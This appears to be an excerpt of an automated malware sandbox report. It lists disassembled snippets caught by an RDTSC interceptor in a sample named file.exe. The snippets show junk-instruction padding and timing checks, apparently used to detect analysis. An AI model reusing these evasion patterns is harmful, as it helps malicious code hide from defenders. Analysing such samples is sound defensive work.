                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8D2F5 second address: C8D30D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F885CCA3F0Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C8D30D second address: C8D31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB9613Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C92DE2 second address: C92E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F885CCA3F16h 0x0000000c pop edi 0x0000000d pushad 0x0000000e jmp 00007F885CCA3F18h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C924BF second address: C924D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F885CB96136h 0x0000000a jp 00007F885CB96136h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C924D6 second address: C924E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F885CCA3F06h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C924E0 second address: C924EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F885CB96136h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C924EA second address: C92522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007F885CCA3F0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F885CCA3F14h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007F885CCA3F06h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C92671 second address: C9268A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F885CB96136h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F885CB9613Ah 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C92987 second address: C9298D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9298D second address: C929AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96148h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37B80 second address: C37BB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CCA3F0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F885CCA3F18h 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jnc 00007F885CCA3F06h 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C37BB7 second address: C37BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F885CB96138h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F885CB96144h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99EB5 second address: C99EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99EBB second address: C99EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99FF1 second address: C99FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C99FF6 second address: C99FFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9A190 second address: C9A196 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DEF5 second address: C9DF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB96148h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DF11 second address: C9DF25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97C9Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9DF25 second address: C9DF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9E511 second address: C9E51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ED03 second address: C9ED0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ED0B second address: C9ED46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F885CB97CA5h 0x0000000c jns 00007F885CB97C9Ch 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 jmp 00007F885CB97C9Ah 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9ED46 second address: C9ED53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F885CC8701Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EE6D second address: C9EE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9EE76 second address: C9EE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C7893F second address: C78943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78A27 second address: C78A48 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F885CC87016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xor dword ptr [esp], 1D0B1062h 0x00000012 mov edi, dword ptr [ebp+122D2013h] 0x00000018 push 95EBC0C5h 0x0000001d push edi 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78B42 second address: C78B47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78B74 second address: C78B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78B83 second address: C78B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C78E81 second address: C78E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C791F6 second address: C79208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79208 second address: C7920D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79635 second address: C573A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F885CB97CA0h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F885CB97C98h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+1248A125h] 0x0000002e call 00007F885CB97CA8h 0x00000033 pop edi 0x00000034 nop 0x00000035 push esi 0x00000036 push eax 0x00000037 jmp 00007F885CB97C9Dh 0x0000003c pop eax 0x0000003d pop esi 0x0000003e push eax 0x0000003f jmp 00007F885CB97C9Eh 0x00000044 nop 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F885CB97C98h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Dh 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f call dword ptr [ebp+12462A10h] 0x00000065 push eax 0x00000066 push edx 0x00000067 jg 00007F885CB97CB2h 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA260C second address: CA263B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F885CC87026h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2793 second address: CA2797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2797 second address: CA279D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA279D second address: CA27A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA27A2 second address: CA27C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87027h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA27C2 second address: CA27C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA27C6 second address: CA27CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA27CA second address: CA27D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2936 second address: CA294F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F885CC87021h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2A8E second address: CA2A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2A92 second address: CA2AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87022h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2AB0 second address: CA2AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2AB4 second address: CA2AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2AB8 second address: CA2ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA2DCC second address: CA2DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F885CC87016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C57389 second address: C573A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA3085 second address: CA30B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87024h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F885CC87021h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8694 second address: CA86E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007F885CB97C9Ch 0x00000010 pop ecx 0x00000011 jmp 00007F885CB97CA6h 0x00000016 jmp 00007F885CB97C9Eh 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8B3B second address: CA8B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8127 second address: CA812B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA812B second address: CA816B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87026h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F885CC8701Ch 0x00000013 jp 00007F885CC87022h 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8FFA second address: CA9000 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA916F second address: CA9173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA943F second address: CA9447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA9447 second address: CA944E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEDE3 second address: CAEDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEDE9 second address: CAEDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEDEF second address: CAEDF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAEDF9 second address: CAEDFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD8E8 second address: CAD90D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F885CB97C96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CADA61 second address: CADA66 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CADD68 second address: CADD74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F885CB97C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CADD74 second address: CADD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE27E second address: CAE289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE289 second address: CAE29A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE53B second address: CAE54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F885CB97C96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE54C second address: CAE550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE68E second address: CAE698 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F885CB97C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAE829 second address: CAE859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jne 00007F885CC8702Ah 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F885CC8701Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAD5D4 second address: CAD5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F885CB97C9Bh 0x00000010 jmp 00007F885CB97CA5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5BE7 second address: CB5C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F885CC87022h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007F885CC87020h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jo 00007F885CC87016h 0x0000001d pushad 0x0000001e popad 0x0000001f jng 00007F885CC87016h 0x00000025 popad 0x00000026 push ebx 0x00000027 jo 00007F885CC87016h 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f pop ebx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5C2F second address: CB5C34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB5C34 second address: CB5C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F885CC87022h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7DB9 second address: CB7DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7DBD second address: CB7DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC8701Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CB7DD0 second address: CB7DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F885CB97C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0252 second address: CC026E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC051D second address: CC055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F885CB97CA1h 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F885CB97C96h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC055A second address: CC055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC055E second address: CC0564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0564 second address: CC0569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0569 second address: CC0571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0571 second address: CC0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C79097 second address: C7909B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0814 second address: CC0849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F885CC87018h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F885CC87016h 0x00000017 pop ecx 0x00000018 jnc 00007F885CC8701Ch 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jne 00007F885CC87016h 0x00000029 ja 00007F885CC87016h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0849 second address: CC084D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC084D second address: CC0853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC13C5 second address: CC13E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jne 00007F885CB97C96h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F885CB97CA1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC53DB second address: CC53FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jo 00007F885CC87016h 0x0000000e jmp 00007F885CC8701Ah 0x00000013 pop edx 0x00000014 push edi 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC53FA second address: CC5407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F885CB97C96h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC4B82 second address: CC4B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
